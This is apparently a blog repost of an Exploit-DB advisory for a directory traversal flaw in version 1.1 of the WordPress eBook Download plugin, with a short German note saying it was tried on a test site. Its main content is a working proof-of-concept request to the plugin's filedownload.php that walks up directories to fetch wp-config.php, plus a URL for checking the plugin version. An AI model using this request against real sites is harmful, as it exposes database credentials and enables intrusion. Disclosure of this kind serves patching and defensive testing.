WordPress eBook Download Plugin 1.1 – Directory Traversal

Posted on Posted in Exploit, Tutorial's
EDB-ID: 39575 CVE: N/A OSVDB-ID: N/A
EDB Verified: YES Author: Wadeek Published: 2016-03-21
Download Exploit: Raw Download Vulnerable App: download
# Exploit Title: WordPress eBook Download 1.1 | Directory Traversal
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/ebook-download.zip
# Version: 1.1
# Tested on: Xampp on Windows7
  
[Version Disclosure]
======================================
http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt
======================================
  
[PoC]
======================================
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
======================================

Quelle: Exploit-db


Video by Meta-Thrunks!

Das Plugin wurde in eine Test-WordPressseite installiert.

Facebooktwittergoogle_plus